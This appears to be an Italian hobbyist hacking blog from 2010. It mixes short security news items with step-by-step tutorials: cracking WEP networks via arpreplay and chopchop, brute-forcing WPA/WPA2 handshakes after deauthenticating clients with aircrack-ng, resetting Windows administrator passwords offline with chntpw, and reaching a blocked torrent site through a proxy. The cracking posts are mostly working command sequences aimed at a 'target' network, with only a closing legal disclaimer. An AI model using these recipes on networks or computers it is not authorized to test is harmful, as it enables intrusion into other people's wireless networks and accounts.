lunedì 13 dicembre 2010

Gli hacker rubano i dati dei clienti di McDonald's

McDonald´s sta lavorando con le forze dell´ordine dopo che degli hacker sono entrati nella banche dati di un´altra società e hanno rubato le informazioni di un numero imprecisato di clienti della catena di fast food.
McDonald´s ha avvertito i clienti, a cui sono stati potenzialmente rubati i dati, sia via e-mail che attraverso un messaggio sul sito di McDonald´s.

Fonte: http://www.hwstation.net

Attacco hacker a Gawker.com: rubate milioni di password

Rubate numerose password utente, probabilmente nell'ordine dei milioni, con un attacco hacker ai danni di Gawker.com. La società consiglia di modificare le password, soprattutto se utilizzate per altri servizi. Gawker è la società che pubblica anche Gizmodo, il sito web che a maggio pubblicò le prime immagini dell'iPhone 4 smarrito dall'ingegnere di Cupertino. 

 Fonte : http://www.macitynet.it

Facebook istituisce una coppa per gli Hacker

Si arruolano hacker su Facebook, ma questa volta non c'entrano né gli amici né i nemici di Wikileaks. Il social network lancia dal prossimo 20 dicembre la Hacker Cup, una competizione internazionale aperta a tutti gli sviluppatori di software nel mondo. Il premio in denaro non è esorbitante, 5.000 dollari al primo classificato e, rispettivamente, 2.000 e 1.000 al secondo e al terzo, ma quel che farà più gola agli hacker di tutto il globo sarà l'accesso ai sancta sanctorum dell'informatica statunitense, e la possibilità di far mostra di sé davanti alle teste d'uovo della Silicon Valley.

Fonte: http://www.lastampa.it

Wikileaks, i DDos non sono così anonimi

L'arresto del sedicenne olandese accusato di aver partecipato agli attacchi contro i siti di Mastercard e Visa l'ha dimostrato: non è saggio improvvisarsi pirati informatici.
L'Università di Twente, nei Paesi Bassi, ha infatti pubblicato un breve studio in cui mostra come chi intenda intraprendere questo genere di attività non può limitarsi a utilizzare uno strumento preconfezionato, ma dovrebbe attivamente pensare a proteggersi.
Il Low Ion Orbit Cannon - lo strumento utilizzato per sferrare gli attacchi DDoS, da solo non fornisce i mezzi per rendersi anonimi: per questo motivo i pirati più "seri" utilizzano sistemi anonimizzanti come TOR per evitare di rendere pubblico il proprio indirizzo IP.
I ricercatori dell'Università di Twente paragonano l'utilizzo di LOIC dal proprio computer a inondare la cassetta della posta di qualcuno con migliaia di lettere, ognuna delle quali porta ben chiaro l'indirizzo del mittente.
Né si può sentire al sicuro chi finora - ad attacchi conclusi - non è ancora stato rintracciato dalle forze dell'ordine: per legge gli ISP devono conservare i dati di connessione dei loro utenti per sei mesi. C'è dunque ancora tempo perché la polizia possa suonare al campanello di questi "pirati della domenica".

Fonte:  http://www.zeusnews.it

Microsoft, 17 bollettini per l'ultimo patch Tuesday del 2010

Martedì prossimo Microsoft rilascerà gli ultimi aggiornamenti del 2010 per i propri prodotti.
Per l'occasione l'azienda ha preparato la bellezza di 17 bollettini di sicurezza che riguardano 40 vulnerabilità in tutti i sistemi operativi supportati e in tutte le versioni di Office supportate.
Due di questi bollettini sono classificati come critici, quattordici importanti e uno moderato

Fonte: http://www.zeusnews.it/

Automated WEP & WPA script!

Ho da poco trovato questi due interessantissimi script per Linux che, a quanto pare, permettono di craccare reti WEP e WPA (Tramite brute force) in automatico lanciando un semplice script!




Ringrazio il forum di backtrack e il creatore dello script

Backtrack “Cambiare Password Admin”



Oggi parliamo di come cambiare la password di un Admin su un sistema Windows XP/Vista.
Per prima cosa dobbiamo smontare la nostra partizione di Windows nel mio caso “hde1″ (per sapere in quale partizione è il Sistema Operativo, usare konqueror… la stringa sarà simile a “media: hde1″):
  • umount /dev/hde1
Adesso dobbiamo creare una cartella in cui montare successivamente la nostra partizione di windows:
  • mkdir /mnt/win
Ora montiamo nella cartella win la partizione contenente il SO:
  • mount -t ntfs-3g /dev/hde1/ /mnt/win
Se il precedente comando restituisce un errore provare con:
  • mount -t ntfs-3g /dev/hde1/ /mnt/win -o force
Ora, grazie al programma chntpw, possiamo vedere la lista degli utenti presenti nel SO e fare le modifiche che preferiamo:
  • chntpw -i /mnt/win/WINDOWS/system32/config/SAM
Una volta che abbiamo la lista degli utenti possiamo modificare quello che vogliamo cambiando il nome “fittizio” con il nome dell’utente:
  • chntpw -u fittizio /mnt/win/WINDOWS/system32/config/SAM
Nel caso la password fosse “Blank” si può provare a cancellare la password usando un’altra opzione con il comando chntpw -i /mnt/win/WINDOWS/system32/config/SAM

WPA/WPA2 'Brute Force' Crack



Oggi parleremo di come cracckare una rete protetta da cifratura WPA o WPA2.
Il metodo è simile a quello usato per le reti WEP, con la differenza che qui abbiamo bisogno di un “Dizionario” (word list). Analizzando la rete dobbiamo catturare l’HANDSHAKE appartenente a quella rete e usare la FORZA BRUTA per trovare la PASSWORD.
In cosa consiste questa BRUTE FORCE? In pratica una volta trovato questo HANDSHAKE noi proviamo tutte le parole/lettere/numeri   presenti nella nostra WORDLIST in modo da trovarne la PSK (pre shared key).
E’ facile capire che se noi abbiamo una wordlist da 10.000.000 di parole e la nostra password è alla fine di questa lista, ci vorrà molto tempo prima di trovare la password corretta. Solitamente un dual core può analizzare circa 300-400 pass al secondo. A questo problema ci viene in contro la nuova tecnologia CUDA di nVidia che permette di sfruttare la potenza di calcolo della nostra GPU (della scheda video), ma di questo ne parleremo in un altro articolo.
Dopo questa premessa, la prima cosa da fare per craccare una WPA/WPA2 è avere una buona WORDLIST. Queste si possono reperire molto facilmente su internet (GOOGLE) oppure è possibile crearsene una personale, ma anche di questo ne parleremo in un altro articolo.
Adesso che abbiamo la nostra wordlist, possiamo cominciare con il vero divertimento:


1) Mettiamo la nostra scheda wifi in monitor mode
sudo airmon-ng start wlan0

-wlan0 è l’interfaccia wifi  (usare iwconfig da terminale per vedere la propria)
Molto probabilmente verrà creata un’interfaccia mon0 al posto di wlan0,  noi useremo sempre mon0 dopo questo passaggio.

2) Ora tramite la monitor mode possiamo scansionare la rete in cerca di AP con protezione WPA/WPA2
sudo airodump-ng –write cap mon0

-   –write crea dei pacchetti cap.cap
- mon0 è l’interfaccia wlan0 in monitor mode
In questo modo possiamo vedere tutte le reti presenti nelle vicinanze e scegliere il nostro bersaglio.

3) Ora concentriamoci sul nostro obiettivo:
sudo airodump-ng -c [canale AP] –bssid [MAC AP] –write cap mon0

Uguale a prima, ma in questo modo analizziamo solo i pacchetti di un singolo AP. La rete deve essere PSK (pre shared key) altrimenti non è possibile usare il brute force e quindi non è possibile tentare di craccarla.

4) Usare aireplay-ng per  deautenticare il client connesso
aireplay-ng -0 5 -a [MAC AP] -c [MAC mia scheda] mon0

-0 è il  deauthentication mode
-5  è il numero di  gruppi  di pacchetti  deauthentication da mandare
Terminato questo comando, nella SHELL dove abbiamo eseguito il punto 3, dovremo vedere comparire il alto a destra “HANDSHAKE”, se questo non compare non possiamo cracckare la rete.

5) Avviare  aircrack-ng per recuperare la  pre-shared key
aircrack-ng -w [dizionario] -b [MAC AP] cap*.cap

-w dizionario è il nome del file dizionario
-  *.cap è il l’lenco dei file di capture che abbiamo collezionato
Se tutto è andato a buon fine avremo come risultato un bellissimo KEY FOUND!

Spesso capita di non riuscire a trovare l’HANDSHAKE, questo può essere dovuto al fatto che per poterlo catturare è necessario essere nella stessa modalità (a/b/g/n) e averete lo stesso rate di dati dell’AP. Possiamo risolvere questo problema provando diverse modalità e diversi rate:

6) Cambiare il rate
iwconfig ath0 rate [auto,1M,2M,5.5M,6M,9M,11M,18M,24M,36M,48M,54M]

A volte la soluzione migliore può essere provare subito  1M  come rate.

7) Cambiare la modalità
iwpriv ath0 mode 2

Mode 0 Automatic (a/b/g)
Mode 1 solo 802.11a
Mode 2 solo 802.11b
Mode 3 solo 802.11g

Per ulteriori chiarimenti o suggerimenti sull’articolo scrivetemi pure.

ThePirateBay Italia censura



Come molti di voi avranno notato, il sito “The Pirate Bay” è stato oscurato negli ultimi giorni. In poche parole noi Italiani non possiamo più accedere a una delle più famose comunità di condivisione di file .torrent . Questa volta il blocco è stato fatto a livello IP.
Ovviamente a questo problema c’è un rimedio, anche molto semplice.
La soluzione è usare un PROXY… Cos’è un PROXY? è un programma che si interpone fra client (cioè noi) e server ( cioè il sito a cui ci vogliamo collegare). In pratica la nostra richiesta, di accedere al sito, viene mandata ad un server in un altro stato ( ad es. USA o altri) e poi da questo server al sito che vogliamo visitare. In questo modo è come se ci trovassimo negli USA, o in un altro stato a seconda della posizione del PROXY. E se noi accediamo dagli USA al sito, siccome negli USA “The Pirate Bay” non è censurato, possiamo navigare tranquillamente.
L’unico difetto di usare un PROXY è che la navigazione risulterà più lenta, ma almeno sarà possibile visualizzare la pagina senza problemi.
Ora, dopo aver dato qualche delucidazione, spiegherò come usare un PROXY.
Ci sono due modi, usare un programma oppure un sito. Nel nostro caso useremo il sito che è più veloce e immediato.
  1. Andiamo sul sito proxy.org
  2. Sulla destra, alla voce “Enter a URL to visit:”, inseriamo l’indirizzo del sito che nel nostro caso è  http://thepiratebay.org/
  3. Nella lista selezioniamo un server proxy a cui collegarci, che non sia in Italia! Quelli verdi sono i più veloci.
  4. Clickiamo su GO e il gioco è fatto!
La pagina si caricherà normalmente con qualche pubblicità in più del normale. Sono solo gli sponsor che il server usa per poter sopravvivere e permettere a noi di usarlo gratuitamente.

ABBASSO LA CENSURA

ABBASSO LA CENSURA


WEP crack ‘--arpreplay’ '--chopchop’


PREREQUISITI:
  1. Avere una distribuzione Linux based
  2. conoscenze minime dei sistemi Unix
  3. aver installato la suite di tool aircrack-ng
In questo articolo parlerò di come cracckare una rete WEP tramite il sistema PTW in due metodi:

1) arpreplay
2) chopchop




METODO ‘ARPREPLAY’

a) Per prima cosa dobbiamo sapere il nome della nostra interfaccia di rete wifi. Usiamo il seguente comando:
  • iwconfig
Solitamente il nome è del tipo ‘wlan0′.

b) Ora dobbiamo mettere la scheda in modalità monitor:
  • sudo airmon-ng start wlan0
Può capitare che, dopo aver lanciato il comando, venga creata in interfaccia virtuale di nome ‘mon0′… questa è quella che dovrete utilizzare quì di seguito. Nel caso questo non avvenga dovrete usare ‘wlan0′.

c) Ora dobbiamo fare una scansione delle reti presenti nelle vicinanze:
  • sudo airodump-ng –write cap mon0
–write = scrive nel file cap.cap
mon0 = è l’interfaccia di rete

In questo modo verranno scritte nel file cap.cap tutte le informazioni catturate.

d) Ora dobbiamo concentrarci sulla nostra rete bersaglio in modo da catturare escusivamente i file di quella rete:
  • sudo airodump-ng -c [canale AP] -b [MAC address] -w cap mon0
-c  = dobbiamo mettere il canale dell’AP
-b   = quì mettiamo il MAC dell’AP da cracckare
-w = scrive sempre sul file cap.cap
mon0 =   è l’interfaccia di rete
Ora, l’unico modo per cracckare una rete è avere un grosso quantitativo di pacchetti da poter analizzare.  Solitamente una rete non ha un grosso quantitativo di pacchetti come traffico, almeno che l’utente attaccato non stia usando la rete per qualche motivo. Ma in ogni caso ci vorrebbe molto tempo (provare per credere).

e) Il nostro scopo è di catturare 5000-10000 ‘DATA’ per una WEP 64 bit, 15000-20000 per una WEP 128 bit.
Quindi useremo il seguente comando:
  • aireplay-ng –arpreplay -b [BSSID AP] -h [MAC STATION] [nome interfaccia]
-b   = il MAC dell’AP
-h = il MAC collegato a quell’AP che viene indicato in basso accanto al MAC dell’AP sotto la voce ‘STATION’
-[nome interfaccia] =  la solita mon0
Come vedete stiamo usando il metodo ‘arpreplay’. Il metodo appena descritto è detto ‘packet injection’. Non tutte le schede supportano l’injection. Anche se ormai sono poche.

f) Appena avremo raggiunto i pacchetti (DATA) necessari dovremo lanciare il seguente comando:
  • aircrack-ng -z -b [BSSID AP] [nome dei file catturati]*.cap
-z =tipo di attacco
-b =  MAC  dell’AP
-[nome dei fiel catturati]*.cap    nel nostro caso sarà   ‘cap*.cap’ … l’asterisco sta per tutti i file cap
Nel caso i pacchetti non fossero abbastanza, comparirà un messaggio del tipo : “Try at 5000 IVS”
In questo caso non fate nulla, lasciate andare avanti la cattura dei pacchetti e appena saranno raggiunti i necessari richiesti, il programma ripartirà automaticamente.
Il messaggio di successo sarà :   KEY FOUND! [XX:XX:XX:XX:XX]       dove al posto delle X ci sarà la password dell’AP.  Possiamo inserire direttamente la password togliendo i due punti, quindi   XXXXXXXXXX.




METODO ‘CHOPCHOP’

Ora ripetiamo i punti a), b), c), d) della precedente parte.
In questo caso non dobbiamo usare la ‘STATION’ abbinata all’AP scelto, ma dobbiamo associare il MAC della nostra scheda all’AP in questo modo:
  • aireplay-ng -1 0  -a [MAC AP] -h [MAC mia scheda] mon0
-1 = metodo per l’autentificazione
-a = il MAC dell’AP
-h = il MAC della nostra scheda
mon0 = interfaccia scheda
Ora, sempre usando il tool ‘aireplay-ng’, dobbiamo catturare i pacchetti:
  • aireplay-ng -4  -b [MAC dell'AP] -h [MAC mia scheda] mon0
-4 = metodo di attacco chopchop
-b = MAC dell’AP
-h = MAC della mia scheda
mon0 = interfaccia come sempre
Ora dobbiamo creare un pacchetto per la richiesta di ARP con il toll packetforge-ng:
  • packetforge-ng -0 -a [MAC dell'AP] -h [MAC mia scheda] -k 255.255.255.255 -l 255.255.255.255.255 -y [nome].xor -w [nome pacchetti]
-0 = crea i pacchetti ARP
-a = MAC dell’AP
-h = MAC mia scheda
-k = IP di destinazione
-l = source IP
-y = legge i PRGA dal file creato con aireplay-ng
-w = crea il file .cap
Ora dobbiamo eseguire il packet injection sfruttando i pacchetti catturati in precedenza (si raccomanda di usare sempre lo stesso nome dei pacchetti catturati per evitare di fare confusione):
  • aireplay-ng -2 -r [nome file] ath0
-2 = interactive frame selection (injection)
-r = qui dobbiamo mettere il nome del file creato precedentemente con -w
Ora non ci resta che analizzare i pacchetti catturati per trovare la password:
  • aircrack-ng -P 2 -b 00:18:F6:AC:11:13 [nome file]*.cap
-P = PTW debug
2 = PTW
-b = MAC dell’AP
[nome file] = al posto di questo dobbiamo mettere il nome dei file catturati con -w
E come prima il risultato sarà:  KEY FOUND! XX:XX:XX:XX:XX  e la password è  senza i due punti.
In caso di errori, suggerimenti o altro commentate!
DISCLAIMER:  i metodi precedentemente descritti sono assolutamente illegali nel caso siano usati su reti non proprie o senza il consenso del proprietario. Non mi prendo nessuna responsabilità dell’uso di questa guida. Questa è esclusivamente a scopo informativo!

WarDriving

Che cos’è il ‘WarDriving’?  Il wardriving è una delle tecniche più utilizzate per mappare le reti presenti in una zona, città, paese. Consiste nell’andare in giro in bici, in macchina o qualunque altro mezzo, e registrare, tramite un dispositivo GPS, le reti della zona scelta; In modo da avere una mappa, ad esempio su google earth, di tutte le reti wifi presenti nella zona.
Solitamente il mezzo più usato è la bici. Il motivo è semplice… Andando in macchina, anche se meno faticoso, con velocità superiori a 30-40 Km/h, si rischia sicuramente di non mappare qualche rete.
I programmi più famosi, usati per sniffare la rete, sono


Questi programmi vengono abbinati spesso con ‘google earth’, in modo da avere una chiara e precisa visione della posizione degli AP (=access point).



Esempio di wardriving su google maps:


Finita la nostra mappatura sarà possibile vedere quali fra questi AP è protetto o meno da una chiave di cifratura (WEP, WPA, WPA2). In questo modo è possibile vedere se è presente, ad esempio, un free internet point a cui potersi collegare.
Questa tecnica di ‘wardriving’ viene anche usate dai ‘Crackers’(Hackers black hat) per avere un’idea delle reti presenti nella zona e per poter sfruttare le vulverabilità e entrare in possesso di dati sensibili di privati o aziende poco furbe…
Quindi le reti non protette sono a rischio, anche le reti WEP e da poco anche le WPA. La WPA2 non è del tutto sicura. Mostrerò, in un prossimo articolo, quanto sia facile craccare una rete WEP o WPA e in alcuni casi anche WPA2.

Hello World!



In questo blog cercherò di parlare in particolare di ‘Linux’ , ‘wardriving’ e ‘hacking’ in generale. Tratterò anche aspetti riguardanti la sicurezza informatica e qualsiasi altra cosa mi venga in mente!